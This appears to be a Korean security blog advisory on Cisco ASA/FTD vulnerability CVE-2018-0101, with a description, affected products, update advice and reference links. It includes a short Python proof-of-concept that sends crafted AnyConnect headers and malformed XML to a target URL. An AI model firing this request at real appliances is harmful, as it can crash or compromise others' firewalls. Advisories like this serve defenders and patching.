포스팅 내용

국내외 보안동향

Cisco ASA 원격코드실행 및 서비스거부 취약점(CVE-2018-0101) 발견!

상세내용


Cisco ASA(Adaptive Security Appliance)는 방화벽, 안티바이러스, 침입방지 시스템 및 VPN 기능을 모두 포함하고 있는 보안장비입니다. 


Cisco FTD(Firepower Threat Defense)는 통합  SW 이미지로, Cisco ASA 기능과 FirePower 서비스를 포함하고 있습니다. 


해당 취약점은 Cisco ASA의 XML 파서 중에 존재하는 것으로, 인증이 되지 않은 원격의 공격자가 해당 시스템에 리로드 혹은 원격 코드실행의 행위들을 허용합니다. 메모리 부족으로 인해 ASA는 VPN 인증 request 처리를 중단할 수도 있습니다. 


해당 취약점은 악성 xml 로드 시,  메모리 할당 및 해제 문제 때문에 발생합니다. 공격자는 해당 취약점에 영향받는 시스템에 조작된 악성 XML 패킷을 전송함으로서 해당 취약점을 악용할 수 있습니다. 


해당 취약점은 쉽게 악용이 가능하며, 디바이스상에서 어떠한 인증과정도 필요하지 않기 때문에 매우 위험합니다. 



취약점 번호 


CVE-2018-0101




PoC


import requests, sys

 

headers = {}

headers['User-Agent'] = 'Open AnyConnect VPN Agent

v7.08-265-gae481214-dirty'

headers['Content-Type'] = 'application/x-www-form-urlencoded'

headers['X-Aggregate-Auth'] = '1'

headers['X-Transcend-Version'] = '1'

headers['Accept-Encoding'] = 'identity'

headers['Accept'] = '*/*'

headers['X-AnyConnect-Platform'] = 'linux-64'

headers['X-Support-HTTP-Auth'] = 'false'

headers['X-Pad'] = '0000000000000000000000000000000000000000'

 

xml = """<?xml version="1.0" encoding="UTF-8"?>

<config-auth client="a" type="a" aggregate-auth-version="a">

    <host-scan-reply>A</host-scan-reply>

</config-auth>

"""

 

r = requests.post(sys.argv[1], data = xml, headers = headers, verify=False,

allow_redirects=False)

 

print(r.status_code)

print(r.headers)

print(r.text)



영향받는 ASA 버전


3000 Series Industrial Security Appliance (ISA)

ASA 5500 Series Adaptive Security Appliances

ASA 5500-X Series Next-Generation Firewalls

ASA Services Module for Cisco Catalyst 6500 Series

Switches and Cisco 7600 Series Routers

ASA 1000V Cloud Firewall

Adaptive Security Virtual Appliance (ASAv)

Firepower 2100 Series Security Appliance

Firepower 4110 Security Appliance

Firepower 4120 Security Appliance

Firepower 4140 Security Appliance

Firepower 4150 Security Appliance

Firepower 9300 ASA Security Module

Firepower Threat Defense Software (FTD)

FTD Virtual



패치방법


최신 버전으로 업데이트


ASA 





FDS





참고 :

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1

https://www.bleepingcomputer.com/news/security/cisco-fixes-remote-code-execution-bug-rated-10-out-of-10-on-severity-scale/

티스토리 방명록 작성
name password homepage